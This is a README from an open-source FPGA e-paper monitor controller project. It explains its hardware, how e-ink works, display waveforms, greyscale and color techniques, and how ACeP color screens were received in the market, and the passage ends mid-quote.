This is a long document, containing not just information about this project, but also pretty much everything I know about Eink. Given it's a bit hard to gather information about Eink online, I think this is the right thing to do. Use the following table of contents to navigate around.
Eink is a registered trademark and brand of E Ink Corporation. All the contents provided in this repo are based on publicly available information online and original research. They are not endorsed by Eink in any way and they may contain errors and/ or inaccuracies.
If you're interested in attaining a board, or the reference monitor, see and subscribe to the [pre-launch page for the Modos Paper Monitor on Crowd Supply](https://www.crowdsupply.com/modos-tech/modos-paper-monitor) for updates.
If you are interested in Eink or any other display technologies, I have a Discord server for that. Feel free to join: https://discord.gg/rtT7euSHQS . (This Discord server is also not endorsed by Eink or any other company. It's not a customer support server.)
## Table of Contents
- [Overview](#overview)
- [Features](#features)
- [Hardware](#hardware)
- [Components](#components)
- [Eink Screens](#eink-screens)
- [Basic Theory of Operation](#basic-theory-of-operation)
- [Advantages and Disadvantages](#advantages-and-disadvantages)
- [The Role of Eink Controller](#the-role-of-eink-controller)
- [Screen Panel Types](#screen-panel-types)
- [Using Screen with Integrated Controller](#using-screen-with-integrated-controller)
- [Using Screen without Integrated Controller](#using-screen-without-integrated-controller)
- [Understanding Waveform](#understanding-waveform)
- [Greyscale Display](#greyscale-display)
- [Color Display](#color-display)
- [Dithering](#dithering)
- [Eink Screen Generations](#eink-screen-generations)
- [Caster/ Glider Design](#design-of-caster-and-glider)
- [Low Latency Drive](#low-latency-drive)
- [Hybrid Greyscale Mode](#hybrid-greyscale-mode)
- [Limitations](#limitations)
- [Hardware Design Decisions]()
- [Gateware Architecture](#gateware-architecture)
- [Firmware Functions](#firmware-functions)
- [Resources Utilization](#resources-utilization)
- [Building](#building)
- [PCB](#pcb)
- [FPGA Bitstream](#fpga-bitstream)
- [MCU Firmware](#mcu-firmware)
- [Working with Waveforms](#working-with-waveforms)
- [Compatible Screens](#compatible-screens)
- [References](#references)
- [License](#license)
- [Appendix](#appendix)
- [Using Screens without Datasheet](#using-screens-without-datasheet)
- [Screen List](#screen-list)
## Overview
### Features
- Complete solution for low-latency/ high-refresh-rate EPD monitor
- Supports electrophoretic display panels with parallel I/F (Eink(R), SiPix and DES)
- Supports both monochrome and color-filter-array (such as Kaleido(TM)) based color screen
- Extremely low processing delay of \<20 us
- Supports binary, 4-level grayscale, and 16-level grayscale output modes
- Latency-optimized binary and 4-level grayscale driving modes
- Hybrid automatic binary and 16-level grayscale driving mode
- Host software runtime controllable regional update and mode switching
- Hardware bayer dithering, blue-noise dithering, and error-diffusion dithering with no additional latency
- Controller natively supports FPD-Link (LVDS), DVI (TMDS), and MIPI-DSI input
- Board-level design supports USB-C (USB Type-C DisplayPort Alt Mode) and DVI input
### Hardware
![r0p7_mb](assets/r0p7_mb.jpg)
- Xilinx(R) Spartan-6 LX16 FPGA running Caster
- DDR3-800 framebuffer memory
- Type-C DisplayPort Alt-Mode video input with onboard PTN3460 DP-LVDS bridge or
- DVI (via microHDMI connector) video input with onboard ADV7611 decoder
- Epaper power supply with up to 1A peak current on +/-15V rail supporting large panels
- VCOM kick-back voltage measurement support
- On-board RaspberryPi(R) RP2040 microcontroller for USB communication and firmware upgrade
- Up to 133MP/s processing rate with dithering enabled, >200MP/s when disabled
The board is designed with KiCad. You may need the latest stable version of KiCad to open the source file.
### Components
This repo hosts the PCB design, firmware source code, and a reference 3D-printable case design. The RTL code is in a separate repo: [https://gitlab.com/zephray/Caster/](https://gitlab.com/zephray/Caster/).
## Eink Screens
Eink is the brand of a family of paper-like electrophoretic displays. The underlying technology is invented in the MIT Media Lab between 1995 and 1997 by Barrett Comiskey, J.D. Albert, and Joseph Jacobson. They later founded the E Ink Corporation to commercialize this technology.
Nowadays they are commonly used on e-readers and electronic shelf labels. You’ve probably seen them on Kindle, in stores, or maybe in some train stations as well.
| eReader/ Tablets | Electronic Shelf Label | Digital Signage |
|-|-|-|
| ![app_ereader](assets/app_ereader.jpg) | ![app_esl](assets/app_esl.jpg) | ![app_signage](assets/app_signage.jpg) |
(Source: https://www.eink.com/application, image copyright Eink corporation)
This section gives an overview of the electrophoretic displays, including the screen panels available and underlying technology. Note this project doesn't and can't support all electrophoretic screens. This documentation also solely focuses on using existing off-the-shelf screen panels rather than the physics or manufacturing process of one.
### Basic Theory of Operation
In the simplest form, you have charged particles with different colors, dispersed in some oil in some transparent container. By applying electric fields the particles can be moved up or down to produce either black or white, or a mixture of that.
![eink-particle](assets/eink_carta.gif)
(Source: https://www.eink.com/tech/detail/How_it_works , copyright Eink Corporation)
There are multiple technologies based on this basic concept, namely Eink’s micro-capsule display, SiPix (now acquired by Eink)’s micro-cup display, and WFT’s DES display. They differ in specific ways of confining the particles in containers, but otherwise very similar.
The pixels on the screen are typically arranged as a 2D array, driven with TFTs. The pixels are scanned/ driven periodically at a fixed refresh rate, typically ranging from 50Hz to 120Hz. Applying positive voltage on the pixel will typically drive the particles toward the white state while applying negative voltage will drive the particles towards the black state. This is similar to active matrix TN/IPS LCDs, which also use 2D TFT arrays and electrical fields for changing state. However, unlike LCDs, EPDs maintain their state after the electrical field is removed. So unlike LCDs which require continuous refreshing, the EPDs only need to be refreshed till the pixels are fully driven.
In terms of driving the screen panel, depending on the pixel value (1 or 0), each pixel would be driven either with a positive voltage or a negative voltage. A global counter can be used to count the frames elapsed and stop driving the pixels after a predefined period of time (for example, 100ms). Two framebuffers are typically used for determining if the pixel has changed color or not. If not, then the pixel does not need to be driven.
### Advantages and Disadvantages
In terms of display quality, EPDs are no match for modern IPS LCDs. The following is a comparison table of key parameters. The specific number would vary depending on the screen used but should be within the same ballpark.
| | Monochrome EPD | CFA-based Color EPD | Transmissive TFT IPS LCD | Reflective TFT TN LCD |
|-|-|-|-|-|
| Contrast Ratio | ~17:1 | ~14:1 | ~1000:1 | ~14:1 |
| Colors | 16 (Greyscale) | 4096 | 16M | 256 |
| Color Gamut | N/A | ~1.5% sRGB | ~99.9% sRGB | N/A |
| Reflectivity | ~45% | ~25% | N/A | ~15% |
| Response Time | ~150ms | ~150ms | ~10ms | ~15ms |
It has a few advantages. It reflects lights instead of emitting lights, so it generally consumes less power and can be used outdoors, etc. It’s also bistable, which means that it retains the image after the power has been removed. Personally, the biggest differentiating factor for me (author of this README) is that it looks like paper.
![rlcd-vs-eink](assets/rlcd_eink.gif)
The image above shows a comparison between reflective TFT LCD (SHARP memory LCD in this case) and Eink. The LCD has a mirror-like texture which changes reflectivity drastically in different angles, while the Eink is more paper-like.
| ZBD LCD | Ch LCD | STN LCD |
|-|-|-|
| ![zbd](assets/zbdlcd.jpg) | ![chlcd](assets/chlcd.jpg) | ![stnlcd](assets/stnlcd.jpg) |
| Bistable, reflective, high contrast, no greyscale, ~10s refresh | Bistable, reflective, lower contrast, up to 32 level greyscale, ~5s refresh | Volatile, reflective, lower contrast, up to 32 level greyscale, ~100ms response |
There are many other reflective or bistable display technologies. They are all interesting displays on their own, but none of them feels like paper (yet).
Overall, there is no single perfect display technology. Each has its own unique strength. Pick the right one for your project.
### The Role of Eink Controller
The Eink controller is in some ways similar to the display controller (DC/ CRTC) + timing controller (TCON) in a typical LCD-based system. It takes the raw image data and converts it to signals required to drive the screen.
![eink-controller](assets/eink_controller.svg)
To understand the actual work of an eink controller, start from the basic concept. The color of a pixel can be changed by applying positive or negative voltage for a finite period of time. From the controller’s perspective, depending on the current state of the pixel and the desired state of the pixel, there are 4 possibilities.
| Current State | Target State | Action |
|-|-|-|
| Black | Black | No operation |
| Black | White | Apply positive voltage |
| White | Black | Apply negative voltage |
| White | White | No operation |
The controller needs to store and maintain the screen state inside of its own buffer memory, so it would typically have a large on-chip SRAM or an off-chip SDRAM controller. The controller should also have a timer to ensure the screen doesn't get overdriven or underdriven.
The controller often uses the so-called "[waveform](#understanding-waveform)" to replace the action column of the previous table. Instead of hardcoding the action for state transition, the actions are stored into a look-up-table (LUT) which can be modified at runtime to allow higher flexibility.
Controllers may also offer more advanced features such as [dithering](#dithering) acceleration, multiple region updates, automatic LUT selection, etc.
### Screen Panel Types
As discussed in the previous section, an Eink screen needs to be coupled to an Eink controller to function. Aside from that, the screen also needs high-voltage drivers to drive the TFTs and the pixels. Virtually all E-paper panels use either COG (Chip-on-Glass) or TAB (Tape Auto Bonding) to integrate some chips onto the screen panel itself. Most of the screens available today can be divided into two categories based on whether or not the controller is integrated in:
![screen-types](assets/screen_types.svg)
Here is a non-exhaustive list of the types based on their size: (the size or resolution is not related to or limited by the type, it is just for a certain size, and the vendors tend to make them the same type.)
- Screens without controller: 4.3", 6.0", 7.8", 8.0", 9.7", 10.3", 13.3", 25.3", 31.2", 42"
- Screens with controller: 1.02", 1.54", 2.13", 2.6", 2.9", 3.71", 4.2", 5.65", 5.83", 7.5", 12.48"
One may notice that almost all e-readers/ e-ink cellphones use screens without controllers, while almost all e-ink electronic shelf labels (ESL) use screens with controllers. This gives some hints about the advantages and disadvantages of two types:
| | Without Controller | With Controller |
|-|-|-|
| System Cost | High. A dedicated controller or SoC with an integrated controller is usually required. Needs a dedicated power supply. | Low. Virtually any MCU could drive the screen directly, and the power supply is integrated in. |
| Greyscale Levels | Generally 16 (4bpp), up to 32 (5bpp) | Generally 2 (BW only) or 4 (2bpp), with some hack, up to 16 (4bpp) |
| Refresh Speed | Generally fast (100ms~300ms) for BW. Depends on the screen used and the system architecture | Generally fast (100ms~300ms) for BW if the partial refresh is enabled. Greyscales are much slower, BWR or BWY screens would be even slower.
| Total Update Latency | Generally the same as refresh time. Depends on the system architecture | Slow. Ranging from 100ms to several seconds based on the resolution. |
Please keep in mind the discussion is about off-the-shelf screens you can buy today. These tradeoffs do not necessarily come from the fact the controller is integrated or not.
Note that I mentioned the refresh speed and total update latency. They are different:
The refresh speed refers to the time it takes to start refreshing the screen: from starting to seeing screen changing, to the screen finish showing the new content.
The total update latency refers to the latency when the processor needs to update the screen, to the screen finish showing the new content. As you can see, this is the biggest issue for screens with controllers. This is the main reason why they are rarely used on e-readers cell phones or PC monitors.
![screen-controller-diagram](assets/screen_cntlr.svg)
This diagram illustrates the difference between the two. It should be noted that the screens without controllers have the flexibility to be driven quickly, but the system designer might not architect the system for low latency.
### Using Screen with Integrated Controller
Screens with integrated controllers have almost everything already integrated. Common display panels of this type only need a few external capacitors, inductors, and MOSFETs to support the integrated bipolar power supply circuit, then it could be hooked up to MCUs or MPUs using common interfaces like SPI or I2C. There are a lot of driving boards and examples of these screens available online.
To be expanded (TODO)
### Using Screen without Integrated Controller
This could get complicated. Note I used a lot of "generally" in the previous comparison table because there are many things one could do to drive them. Some of them would certainly impact the performance. The main issue here is the controller chip. There are three solutions to drive these screens:
- Using a dedicated controller chip to drive the screen
- Using an SoC that has an integrated controller
- Using a fast MCU/SoC to emulate the controller with GPIO (software timing controller)
Then, again here is a comparison between them:
| | Specialized controller chip | SoC with integrated controller | MCU + Software TCON |
|-|-|-|-|
| Resolution | UXGA+ | UXGA+ | Limited by MCU RAM. Up to XGA with SRAM, UXGA with PSRAM, UXGA+ with DDR |
| Greyscale | Up to 32 | Up to 32 | Up to 32 |
| Partial Update | Yes | Yes | Yes |
| Total Update Latency | Depends. Could be very close to refresh speed, could be slow like screens with controller | Same as refresh speed | Same as refresh speed if data is internally generated (not streaming from an external device such as a PC) |
| Suitable Applications | IoT devices, E-readers, cellphones, E-ink monitors. possibly E-ink laptops | Advanced IoT devices, E-readers, cellphones, E-ink typewriters, possibly lower performance E-ink laptops | When using MCU: IoT devices, large ESLs, simple DIY E-readers. When using MPU: Same as SoC with integrated controller |
When using a dedicated controller, it could accept data from external devices. This allows it to be used in various different types of applications. Ranging from IoT devices, and ESLs, to PC monitors with relatively fast refresh rate and low latency.
When using SoC or MCU, the display content is generated by the SoC or MCU itself, which ultimately is limited by the capability of the SoC or MCU. Given the current SoCs with E-ink display controllers are usually limited in performance, the application is limited. The same goes for MCU, it does what an MCU could do. You could find ways to stream video data into SoC or MCUs by using USB, camera interface, WiFi, etc., but this might not be optimal.
#### Existing Solutions
- Specialized controller chip
- Closed-source
- EPSON S1D13xxx: Widely used EPD controller in early E-readers. Proprietary, no documents available. Probably EOL.
- IT8951: Used on the waveshare EPD Hat. Documents are available. It works with large EPDs up to 2048x2048. The drawback is the speed as the interface between processor and IT8951 could be slow. This is similar to the situation on screens with integrated controller
- T1000: Also known as IT8957, upgraded model of IT8951. It supports even higher resolution. It features a higher speed MIPI DSI interface to mitigate the slow speed of IT8951.
- Waveshare HDMI driver board: FPGA-based controller. Closed source but easily purchasable, could be integrated into larger projects as a module.
- Open-source
- This project (Caster + Glider): FPGA-based controller, multiple update modes, ultra-low latency processing, and wide range of screen support.
- https://hackaday.io/project/21607-paperback-a-desktop-epaper-monitor: FPGA-based controller. However, doesn't support partial update mode and slower speed.
- https://hackaday.io/project/21168-fpga-eink-controller: FPGA-based controller supports vendor waveform with reasonable speed.
- SoC with integrated controller
- RK29xx: Fairly old, Cortex-A8 based (RPi 1 level performance), 55nm, EOL
- RK3026/RK3028: Fairly old, Cortex-A9 based (RPi 2 level performance), 40nm, EOL
- i.MX 50: Fairly old, Cortex-A8 based (RPi 1 level performance), 65nm, in production
- i.MX 6ULL: Cortex-A7 based (RPi 1 level performance), 40nm, in production
- i.MX 6S/D: Fairly old, Cortex-A9 based (RPi 2-3 level performance), 40nm, in production
- i.MX 7S/D: Cortex-A7 based (RPi 2 level performance), 28nm, in production
- i.MX 8ULP: Cortex-A35 based (RPi 2 level performance), 28nm FD-SOI, in production
- AW B200: Cortex-A53 based (RPi 2 level performance), 28nm, in production
- MT8113: Cortex-A53 based (RPi 2 level performance), 12nm, in production
- RK3566/RK3568: Cortex-A55 based (RPi 3 level performance), 22nm, in production
- RK3576: Cortex-A72 + A53 based (RPi 4-5 level performance), 8nm, in production
- MCU/SoC + Software TCON
- http://essentialscrap.com/eink/waveforms.html: One of the earliest e-ink hacks. Limited in performance but still could be used as a reference
- NekoCal: One of the earliest e-ink software TCON with greyscale support. Used to be available as a DIY kit. No longer updated, still could be used as a reference
- InkPlate 6/10: Commercially available. Based on ESP32.
- EPDiy: Based on ESP32, supports a lot of different screens, recommended if want to build some device with ESP32+Eink or embed it into a larger project.
#### Interface Signals and Timing
The interface signals and timing are fairly similar to LCDs without a controller. Following is the list of signals typically found on EPDs:
- GDOE/ MODE: Gate driver output enable
- GDCLK/ CKV: Gate driver clock (like HSYNC in LCD)
- GDSP/ SPV: Gate driver start pulse (like VSYNC in LCD)
- SDCLK/ XCL: Source driver clock (like PCLK in LCD)
- SDLE/ XLE: Source driver latch enable (like HSYNC in LCD)
- SDOE/ XOE: Source driver output enable
- SDCE/ XSTL: Source driver start pulse (like DE in LCD)
- SD: Source driver data (8-bit or 16-bit)
SD signals go into the source driver, typically in the X direction. GD signals go into the gate driver, typically in the Y direction. It's a 2D array, the gate driver selects one line at a time, and the source driver outputs the voltage for all the pixels in that line.
Conceptually, it's like a raster scan on a CRT. To send one field of data, both GD and SD are reset to the start position by using the start pulse signal. Data are then transmitted into the source driver 4 or 8 pixels at a time. Once the line has been fully transmitted, the source driver is reset to the beginning position by a start pulse signal, and the gate driver moves to the next line by a pulse on the gate driver clock. Once all lines have been scanned, the entire process repeats for the next field.
One notable difference with LCD is that each pixel is represented by 2 bits. This, however, doesn't mean each pixel is 2bpp or 4-level greyscale. The 2-bit per pixel is used to encode the voltage applied to the pixel:
- 00: No voltage
- 01: Negative voltage
- 10: Positive voltage
- 11: No voltage
Just like CRT/ LCD, there are also blanking periods in the entire timing (which means it's just waiting without active pixel data being sent). They have identical meanings to CRT/ LCD systems:
![display-timings](assets/display-timings.png)
(Source: https://projectf.io/posts/video-timings-vga-720p-1080p/, Copyright Will Green)
The following is a piece of pseudo-code implementing the Eink timing:
```c
#define DATA_BUS_WIDTH 8 // 8bit wide bus
#define PIXEL_PER_CYCLE (DATA_BUS_WIDTH / 2)
#define VFP 12 // Vertical front porch
#define VSYNC 1 // Vertical sync length
#define VBP 2 // Vertical back porch
#define VACT 758 // Vertical active lines
#define HFP 72 // Horizontal front porch
#define HSYNC 2 // Horizontal sync length
#define HBP 2 // Horizontal back porch
#define HACT (1024 / PIXEL_PER_CYCLE)
void pulse_h_clock() {
sdclk = 1;
sdclk = 0;
}
void drive_line(bool v_in_act) {
sdce = 1;
gdclk = 0;
for (int i = 0; i < HFP; i++) pulse_h_clock();
sdle = 1;
gdclk = 1;
for (int i = 0; i < HSYNC; i++) pulse_h_clock();
sdle = 0;
for (int i = 0; i < HBP; i++) pulse_h_clock();
if (v_in_act) sdce = 0;
for (int i = 0; i < HACT; i++) {
send_data();
pulse_h_clock();
}
}
void drive_frame() {
gdoe = 0;
sdoe = 0;
gdsp = 1;
for (int i = 0; i < VFP; i++) drive_line(false);
gdsp = 0;
gdoe = 1;
sdoe = 1;
for (int i = 0; i < VSYNC; i++) drive_line(false);
gdsp = 1;
for (int i = 0; i < VBP; i++) drive_line(false);
for (int i = 0; i < VACT; i++) drive_line(true);
}
```
More explanation can be found at [http://essentialscrap.com/eink/index.html](http://essentialscrap.com/eink/index.html)
### Understanding Waveform
The waveform is a look-up table for the eink controller to determine how to drive the pixels, mostly useful for greyscale image display, but generally used for binary image display as well.
The look-up-table has 3 inputs (dimensions): frame number, source grayscale level, and destination grayscale level. During the update process, for a certain pixel, the source and destination level stays the same, and the frame number increases each frame. The look-up process is done for every pixel every frame. The controller may choose different LUTs depending on the ambient temperature. Mode switching is also implemented by simply switching between different LUTs.
This is essentially what typically eink controller does. For each pixel, look up in the table to determine the voltage to use. Repeat this for a couple of frames with an incrementing frame counter, until all pixels are fully driven.
It should be obvious that the waveform file itself is independent of the resolution as the waveform only cares about a single pixel. With an incorrect or un-optimal waveform, the screen should at least display some recognizable image.
#### Waveform Example
There are several sample waveform tables provided in the project repo. Take the GC16 (Greyscale clearing 16-level) waveform of GDEW101C01 as an example: https://github.com/zephray/NekoInk/blob/master/waveform/gdew101_gd/test_M2_T0.csv
Take one line from that file:
```6,13,0,0,0,0,0,0,0,0,0,2,1,1,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,0```
This means from greyscale level 6 to level 13, it needs to go through the following sequence. Each number means the operation on that frame, 0 is no-operation, 1 is darken, and 2 is lighten. In this case, there are 38 frames, first 9 frames do nothing, then lighten for 1 frame, darken for 10 frames, lighten for 16 frames, and finally darken for 1 frame and have no operation for the last frame. This is the sequence to change a pixel from level 6 to level 13. Such lookup is done for every pixel on every frame.
For specifics on waveform file formats, check the [Working with Waveforms](#working-with-waveforms) section.
#### Waveform Modes
To give system designers more flexibility, Eink controllers often offer multiple "modes", like binary mode, 16-level grayscale mode, 16-level grayscale mode with reduced flashing, 4-level grayscale mode, etc.
The waveform provided by Eink has many modes. There is a good document from Eink describing the modes:
https://www.waveshare.net/w/upload/c/c4/E-paper-mode-declaration.pdf
It provides a good overview of the modes. I am just going to add some comments.
- GC in the GC16 stands for "greyscale clearing". GC does not stand for greyscale. There are 16-level greyscale modes that aren't called GC16.
- Officially there are no 32-level greyscale modes (yet). There are 5-bit waveforms, which means they internally use 5 bits for each pixel, which potentially allows up to 32-level greyscale, but no such waveform exists (yet).
- There are no 16-level greyscale modes without flashing. The DU4 is the only greyscale mode that's non-flashing.
- The GL16 mode, as described, only works for black text on a white background. When refreshing greyscale images, the GL16 is similar to the GC16.
- The GLR16 mode is also called the REGAL mode, and the GLD16 mode is also called the REGAL-D mode.
- Eink doesn't even know if it should be spelled as REAGL or REGAL: Google search "REAGL site:eink.com" and "REGAL site:eink.com" both returned several results.
- Eink-provided waveform usually implements all these modes, however it is not always required. The waveform file may also contain waveform tables in other orders.
- In terms of the waveform, the waveform for GL16, GLR16, and GLD16 are identical. This is expected, the REGAL requires an additional algorithm on the host image processing and is not a technology based on tweaking the waveform.
#### Waveform Tweaks
Some commercial implementations allow users to reduce the frame count and/ or alter the waveform playback speed, so the user can trade between contrast ratio and frame rate.
### Greyscale Display
Other than full white and full black, with appropriate modulation, Eink screens can also display some levels of greyscale (typically 16).
![greyscale](assets/eink_32g.jpg)
For grayscale displays, the basic idea is simple. If the pixel is not fully driven (say only drives for 50ms while it takes 100ms to reach full black/ white), it would stay in a gray state.
There are two ways of achieving this modulation:
- Modulate the frame time
- Modulate the number of frames with constant frame rate
Both are possible, as described below
#### Frame Time Modulation
This method changes the drive time by changing the length of a single frame. The screen would only be driven for 15 or 31 frames for 16-level and 32-level greyscale, but the frame time (thus frame rate) is altered to provide the desired driving time. The LUT would be a one-dimension look-up table, only containing the incremental time required to drive to the next greyscale level. The source/ gate driver output enables the line to be toggled to achieve the desired driving time.
This method doesn't seem to be implemented in any commercial solutions and is significantly slower than the second method. But it certainly works. The 32-level greyscale demo shown in the picture above is achieved using this method.
#### Frame Count Modulation
This method changes the drive time by changing the number of frames being applied to the screen. The screen is still being driven at a constant frame rate. The following is a simplified hypothetical waveform table for achieving 4-level greyscale:
| Previous State | Target State | Frame 0 | Frame 1 | Frame 2 | Frame 3 | Frame 4|
|-|-|-|-|-|-|-|
| Black | Black | NOP | NOP| NOP | NOP | NOP |
| Black | Dark Grey | VPOS | VNEG | VPOS | NOP | NOP |
| Black | Light Grey | VPOS | VNEG | VPOS | VPOS | NOP |
| Black | White | VPOS | VNEG | VPOS | VPOS | VPOS |
Note how it alternates between VPOS and VNEG in the beginning. This is often called the "activation phase" to improve the contrast ratio. Putting this detail aside, it changes the number of VPOS frames to settle down on different grey levels.
The actual grayscale driving sequence used in the commercial implementation is more complex than that, often involving switching the pixel towards black/white a few times before settling. This design is partially due to the limited time control granularity and other temperature/ manufacturing variance-related concerns. Some side-effects of such a driving sequence are that the refreshing process is “flashing”, and is slower compared to displaying only a 1-bit binary image.
### Color Display
There are several different technologies that could be used to build full-color EPDs. The 2 most common ways are to use a color-filter-array (CFA) or use a multi-pigment color display.
The following picture has the multiple pigment color display (ACeP Gallery 3) on the left, and a CFA-based color screen (Kaleido Plus) on the right, displaying the same image.
![gallery3_kaleido](assets/gallery3_kaleido_plus.jpg)
(Original illustration copyright MiHoYo)
#### Color Filter Array
CFA stands for color filter array, which is colored glass/ film on top of the screen pixel. This is also the technology used on most color LCDs. Eink Kaleido, Eink Triton, and color DES are based on this technology. The main advantage is that it's relatively simple to control, and the low-level driving is the same with the greyscale panels. Thus it has the same level of refreshing time (100~200ms), and the same level of greyscale (16 level translate to 16^3=4096 colors). The drawback is that the CFA filters out some light (due to its colored nature), and the screen reflectivity is negatively affected by the CFA. The screen ends up being quite dark. Up to now, most color E-readers use CFA-based displays. This project supports all three major types of CFA-based EPD screens: color DES screen, Eink Triton, and Eink Kaleido.
#### Case Study: GDEW101C01 (CFA-based, DES)
The GDEW101C01 is a 10.1" color DES screen made by Good Display / WeiFeng Tech. It uses CFA to produce color images. As a result, to the eink controller hardware, it's just a normal greyscale panel with a bunch of pixels. However, the pixels are colored depending on their location due to the CFA. The coloring of the pixels can be either handled by hardware or software.
##### Pixel Arrangement
Color DES is a bit different from a typical color TFT LCD in terms of CFA design. Typically on TFT LCDs, one RGB pixel is called a pixel, and each R/G/B component is called as a sub-pixel. On color DES, the sub-pixel ends up being called a pixel, and each pixel is either red, green, or blue. In the display industry, such pixels are more commonly referred to as dots.
![subpixel](assets/subpixel.jpg)
Pengo, CC BY-SA 3.0 https://creativecommons.org/licenses/by-sa/3.0, via Wikimedia Commons
The actual photo of the DES panel under the microscope:
![color-des](assets/color_des.jpg)
In the above photo, the DES pixel arrangement is the same as the OLPC XO-1. Notably, many Eink's Kaleido 3 (but not all) also uses the same pixel arrangement.
Having no subpixel / each pixel only has 1 color doesn't necessarily mean that the effective resolution needs to be divided by 3. This arrangement is slightly more "efficient" than the RGB strip in terms of perceptive resolution. You can find a more detailed analysis in the paper Comparing the Effective Resolution of Various RGB Subpixel Layout.
##### Processing image for Color DES
If the image is displayed on color DES without any processing, it would look like a greyscale image. This is similar to when you just send the same color value to R/G/B components on a color LCD.
To get color, send only the color component that corresponds to the pixel color.
![pixel-layout](assets/PixelLayoutDiagonal.png)
(Source: https://wiki.laptop.org/go/File:PixelLayoutDiagonal.png, public domain)
For example, for pixel 01, the pixel on the screen is green. Then only the green component from the frame buffer should be sent to the screen.
To get a basic 4096 color image display, this is everything needed. However generally to improve image quality, a few more steps are applied:
##### Low pass filtering
The previously described image-displaying process is essentially a down-sampling process for each color component: Only 1/3 of the pixels are sent to the screen. Then this becomes a classic signal processing issue: sampling the signal would cause frequency components above Nyquist to fold back to the low frequency part. Or in simpler words, you would see jagged edges/ aliasing, which are things that weren't present in the original image. To prevent this, low pass filtering (blurring) needs to be applied first to the image to remove these high-frequency components. The following diagram from the OLPC wiki shows a simple way of implementing a such filter:
![pixel-proc](assets/PixelProcDiagonal.png)
(Source: https://wiki.laptop.org/go/File:PixelProcDiagonal.png, public domain)
##### Dithering
Dithering can be applied to further improve image quality. See the dithering section for more details.
#### Multi-Pigment Color Display
Another technology for implementing color EPD is by using a multi-pigment color display. This is a technology developed initially by SiPix and further improved by Eink. The basic idea is to use ink particles with different colors inside a single pixel. By applying a sequence of voltages, the ink particles can be arranged to display different colors.
![spectra6](assets/eink_spectra6.jpg)
(Source: https://www.eink.com/tech/detail/How_it_works , copyright Eink Corporation)
One major advantage of this solution is it can achieve higher resolution (because it doesn't have a CFA, so no resolution reduction), higher reflectivity (because it doesn't have a CFA, so no light loss), and higher color saturation (because it doesn't have a CFA, no need to play the reflectivity vs saturation trade-off game).
Eink has 2 lines of products using this Technology, Eink Gallery and Eink Spectra. The advantage is it's much brighter compared to CFA-based solutions. The disadvantage is it's much more difficult to drive, and quite slow: 1st /2nd gen Eink Gallery screen takes 30s (!) to refresh, and Spectra 6 Plus devices take 7s to refresh. It's possible to trade in some color saturation for higher speed, though still much slower than CFA-based solutions. The specific product lines will be discussed in [Eink Screen Generations](#eink-screen-generations)
##### How ACeP Waveform Works
To be written (TODO)
##### How to get more colors on ACeP
This is possible with a modified waveform.
To be written (TODO)
##### What Happened To ACeP?
[ACeP was supposed to be the "next big thing" in ereader](https://arstechnica.com/gadgets/2022/04/new-e-ink-gallery-displays-could-finally-make-full-color-e-readers-good/). Back in the end 2022, Eink announced that ["Gallery 3 has moved into mass production, with customer products from Bigme, BOOX, iFlyTek, iReader, PocketBook, Readmoo, and AOC coming down the pipeline in 2023 and beyond"](https://www.e-ink-info.com/e-ink-gallery-3-acep-color-epaper-displays-move-mass-production). But 2023 passed with exactly one product, the Bigme Galy, with mixed receptions. Early 2024, it was announced that [Bigme Galy has been discontinued](https://goodereader.com/blog/electronic-readers/bigme-galy-is-discontinued), and [Eink has announced EOL for certain ACeP-based products](https://www.ineltek.com/wp-content/uploads/2024/04/EInk_AC073TC1_EOLNoticeLetter_notice_20240401.pdf). It does sound like ACeP is now dead.
The following are purely my speculation. But I see this as 2 separate decisions:
- ~~There will be no more multi-pigment-based displays for the eReader market~~
- ACeP (CMYW) is being replaced with Spectra 6 (RYBW) in other markets
The second one is evident from the EOL notice linked previously, the 7.3" ACeP screen has a direct replacement of the 7.3" Spectra 6 screen. One major drawback of ACeP in the digital signage market (as far as I see) is its inability to reproduce the cyan color. This actually means there is no good way to display blue sky on an ACeP screen, not even through dithering, it's simply outside of its color gamut. By changing the base colors used, Eink was able to mitigate this issue in the Spectra 6 product lines.
The first one is more or less speculation. (UPDATE: I WAS WRONG, read on) I have two clues for that. One is the fact that Eink is doubling down on digital signage for Spectra 6: [Both 13.3" and 31.5" Spectra 6 screens will have integrated controller](https://www.beck-elektronik.de/en/newsroom/news/article/e-ink-spectratm-6-der-hingucker-des-jahres-2024). This make them much more interesting for the signage applications, but unsuitable for eReader applications. The other is that [the 8" Spectra 6 Plus screen](https://www.ereaderpro.co.uk/en/blogs/news/e-ink-news-eink-technology-has-unveiled-the-new-generation-of-colour-e-paper-technology-e-ink-spectra-6-plus-designed-for-retail-tags-and-advertising-billboards), while using the same backplane as the Gallery 3 ACeP screen, now quote a 7 second refresh time (compared to less than a second on Gallery 3). If Eink still wanted to make a Spectra 6 eReader screen, this 8" backplane would be the one to use given it was used in the ACeP product line.
Objectively, the ACeP screen on the Bigme Galy pretty much doesn't make any sense anyway. It suffers from poor reflectivity and poor saturation to a point where it's not much better than Kaleido (see the previous photo). The difference between Gallery 3 and Gallery Palette (which is supposed to be a lower-end product) is also stunning:
![acep_comparison](assets/gallery3_gallerypalette.jpg)
(Original illustration copyright MiHoYo)
The one on the left is the Gallery 3 used on eReaders, and the one on the right (brighter and more saturated one) is the Gallery Palette used on ESLs. Though to be honest I hacked the right one a bit to display 512 colors opposed to the stock 7 colors. If Gallery 3 had the same image quality as previous ACeP/ Gallery screens, it would make sense to trade in response time for better image quality. But it doesn't.
So is the ACeP dead? Yes and no. ~~Yes in the sense that we are less likely to see any new ACeP products in the future~~, and we are also unlikely to see any Spectra 6-based eReader products. No in the sense that ACeP is superseded by Spectra 6, so the technology lives on. Just like how the Pearl replaced the Vizplex, and the Carta replaced the Pearl. Now we have Carta so we don't look back to the older generation of screens. Also, in another sense, there are likely at least thousands of ACeP screens already manufactured but haven't been made into consumer devices. We will probably see these screens in the not-too-distant future!
UPDATE: As pointed out in a [reddit post by Disastrous_Analyst_1](https://www.reddit.com/r/eink/comments/1d2j4mv/gallery_3_part_ii/), Eink in their [2023 Annual Report](https://www.eink.com/upload/2024_05_27/47_20240527170208rfrozhGN77.pdf) said that "In 2024, we will provide an upgraded version of the 8-inch advanced color ePaper (Gallery™ 3), aiming to deliver optimized performance and enhanced visual experience for customers. (在 2024 年,我們將進一步提供進階版 8 吋先進彩色電子紙(Gallery ™ 3),期待能提
